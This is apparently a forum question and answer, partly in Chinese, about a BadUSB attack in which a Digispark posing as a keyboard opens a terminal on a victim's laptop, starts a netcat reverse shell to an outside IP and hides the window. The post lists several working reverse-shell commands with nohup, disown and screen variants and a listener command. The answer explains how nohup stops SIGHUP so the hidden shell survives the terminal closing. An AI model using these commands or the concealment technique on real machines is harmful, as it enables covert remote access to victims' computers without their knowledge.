场景:攻击者将充当键盘的USB插入受害者的笔记本电脑。有效负载打开终端,执行反向外壳并隐藏终端。
问题:我在本地进行的测试(ubuntu 19.04,digispark为usb)如下:
一
terminal A nc -e /bin/bash 10.10.10.10 8888
terminal B nc -vlp 8888
一切正常,我在终端B上显示了带有提示符的shell,但没有隐藏终端A。那么在这种情况下它是没有用的。
二
terminal A nc -e /bin/bash 10.10.10.10 8888&; disown; exit
terminal B nc -vlp 8888
终端B只是挂起而终端A是隐藏的。无用。
三
terminal A nohup nc -e /bin/bash 10.10.10.10 8888&; exit
terminal B nc -vlp 8888
终端B只是挂起而终端A是隐藏的
四
terminal A: I open screen then executenc -e /bin/bash 10.10.10.10 8888 , CTRL^A , then d and finally exit.
terminal B nc -vlp 8888
using screen everything works (terminal B receives a working shell and terminal A isn't visible) but I don't want to use screen because it is not installed by default.
QUESTION: is there a way (using preinstalled tools) to hidden the terminal without screen but with the same effect?
Shell退出后,终端将注销或关闭(取决于终端是哪种终端),并将SIGHUP发送到控制进程组,这将导致nc退出。
Using
nohupdetaches from the terminal and runsncin its own process group (so it will no longer be in the terminal's controlling process group), so the SIGHUP won't be sent to it.